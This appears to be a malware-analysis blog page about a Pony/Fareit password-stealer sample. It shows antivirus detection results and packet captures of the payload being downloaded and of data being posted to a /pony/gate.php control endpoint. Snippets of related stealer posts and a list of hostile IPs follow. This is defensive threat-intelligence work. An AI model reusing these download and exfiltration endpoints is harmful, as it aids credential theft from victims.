| SHA256: | 09002c686e358799a9d732f4483a31a858bb140a3dfd59df54b1d449d2f8122b |
| File name: | t00lz.exe |
| Detection ratio: | 50 / 55 |
| Analysis date: | 2016-11-02 02:52:48 UTC ( 2 minutes ago ) |
| Ad-Aware | Gen:Variant.Razy.11684 | 20161102
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| AegisLab | Troj.W32.Gen.lIb0 | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| AhnLab-V3 | Trojan/Win32.Tepfer.N2144687522 | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Antiy-AVL | Trojan[:HEUR]/Win32.Unknown | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Arcabit | Trojan.Razy.D2DA4 | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Avast | Win32:Evo-gen [Susp] | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Avira (no cloud) | TR/PSW.Fareit.iloen | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Baidu | Win32.Trojan-PSW.Fareit.a | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| BitDefender | Gen:Variant.Razy.11684 | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| CAT-QuickHeal | PWS.Fareit.E3 | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ClamAV | Win.Trojan.Fareit-403 | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Comodo | TrojWare.Win32.PWS.Fareit.GS | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| CrowdStrike Falcon (ML) | malicious_confidence_98% (W) | 20161024 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Cyren | W32/Tepfer.R.gen!Eldorado | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| DrWeb | Trojan.PWS.Stealer.1932 | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ESET-NOD32 | a variant of Win32/PSW.Fareit.A | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Emsisoft | Gen:Variant.Razy.11684 (B) | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| F-Prot | W32/Tepfer.R.gen!Eldorado | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| F-Secure | Gen:Variant.Razy.11684 | 20161102 |
2016-11-01 21:22:37.170895 IP 192.168.1.102.51077 > 216.34.181.96.80: Flags [P.], seq 0:298, ack 1, win 64240, length 298: HTTP: GET /pony/t00lz.exe HTTP/1.1
E..R.w@……..f.”.`…P,.J8….P…]i..GET /pony/t00lz.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: t00lz.sourceforge.net
Connection: Keep-Alive
2016-11-01 21:22:37.225484 IP 192.168.1.102.51077 > 216.34.181.96.80: Flags [.], ack 2921, win 64240, length 0
E..(.x@……..f.”.`…P,.Kb….P….Y……..
—
E..(..@……..f.”.`…PX3|F..lpP…M}……..
2016-11-01 21:22:45.130245 IP 192.168.1.102.51078 > 216.34.181.96.80: Flags [P.], seq 0:274, ack 1, win 64240, length 274: HTTP: POST /pony/gate.php HTTP/1.0
E..:..@……..f.”.`…PX3|F..lpP…@s..POST /pony/gate.php HTTP/1.0
Host: t00lz.sourceforge.net
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 338
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Written By
You must be logged in to post a comment.
2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1 E....=@...wX . ...u-.N.P'&"i....P.@).Q..GET /zxcv.EXE HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozill...
AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info...
Predator the Thief is an information stealer, meaning that it is a malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information as well as retrieve payment data from cryptocurrency wallet...
Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64 Dynamic Analysis Report Classification:DownloaderSpyware Threat Names:AZORult v3Gen:Varian...
[…] Original article: Razy/Fareit Variant Pony Trojan Downloader Malware FULL PCAP File Download Traffic Sample gate.php. […]